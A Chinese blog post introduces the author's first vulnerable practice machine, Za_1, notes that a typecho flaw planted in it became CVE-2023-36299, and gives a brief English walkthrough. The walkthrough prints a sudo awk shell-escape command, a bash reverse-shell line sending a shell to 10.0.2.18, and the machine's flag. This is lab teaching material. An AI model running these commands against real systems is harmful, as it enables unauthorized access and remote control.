前言
这是我第一个制作的靶机,七月份做的,但没有来得及录制视频就去军训了
为了开个好头我做的比较简单,当然也比较草率
我先后把它放在了bilibili的动态以及hackmyvm平台(审核比较慢。8-23上线)
目前能统计的完成的人总共有50+,还行吧哈哈
我本以为各位会觉得我做的水
结果反响还可以,有两点的我是真没想到:
一是:有几个油管博主为我的靶机做了半个小时左右的视频,我看了一个西班牙小哥做的,很详细
并且丝毫不吝啬赞美之词,令我深受鼓舞
另一个我没想到的是有个哥们申请了我留的typecho漏洞,其实就是一个可修可不修的洞
竟然被提交成功了,编号是CVE-2023-36299
我是七月中旬做的靶机,漏洞是八月初提交的
评分8.8分,还是很高危的,不过国内的貌似typecho并不打算修,哈哈,很佩服这哥们的严谨,作为一年多typecho用户的我就没想到提交这个漏洞
下面我们就开始看一下这个靶机详情
下载:
我本来上传到123pan但是123开始收费了
因此推荐去hackmyvm下载
https://hackmyvm.eu/machines/machine.php?vm=Za1
wp:
hackmyvm打开有wp,都可以看看
下面是我当时写的
由于为了方便审核,故用了我拙劣的英语写的
大家要是看不懂可以去看油管视频演示
Za_1
-
level:easy
-
Port Scanning and Service Identification
-
Exploring the Website
-
Gaining Access
-
Privilege Escalation
Port Scanning and Service Identification
Exploring the Website
open 80 port
open sercet.sql in DB Browser for sqlite
we see user and pass
zacarx
zacarx
Gaining Access
PE(1)
sudo -u za_1 awk 'BEGIN {system("/bin/sh")}'
flag{ThursD0y_v_wo_50}
PE(2)
we see /.root/back.sh
echo "bash -i >&/dev/tcp/10.0.2.18/999 0>&1" >> back.sh
原文始发于微信公众号(Zacarx随笔):Za_1与CVE-2023-36299的发现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论